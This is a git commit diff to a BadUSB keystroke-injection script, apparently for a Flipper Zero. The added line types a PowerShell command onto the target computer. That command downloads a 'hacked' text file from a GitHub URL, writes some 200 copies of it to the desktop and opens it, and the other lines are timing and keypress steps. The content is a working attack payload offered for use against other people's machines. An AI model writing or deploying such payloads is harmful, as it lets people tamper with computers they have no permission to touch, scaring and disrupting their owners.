Update you_have_been_hacked_desktop.txt

This commit is contained in:
Yann
2023-03-31 09:03:22 +02:00
committed by GitHub
parent 94300b031e
commit 1ea1c3470f
@@ -10,3 +10,4 @@ DELAY 500
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/hacked.txt -OutFile $DesktopPath/H4ck3D.txt; while($ac -lt 200) { Copy-Item "$DesktopPath/H4ck3D.txt" -Destination "$DesktopPath/hacked$ac.txt"; $ac++};Start-Process -FilePath "$DesktopPath/H4ck3D.txt"
DELAY 100
ENTER
GUI D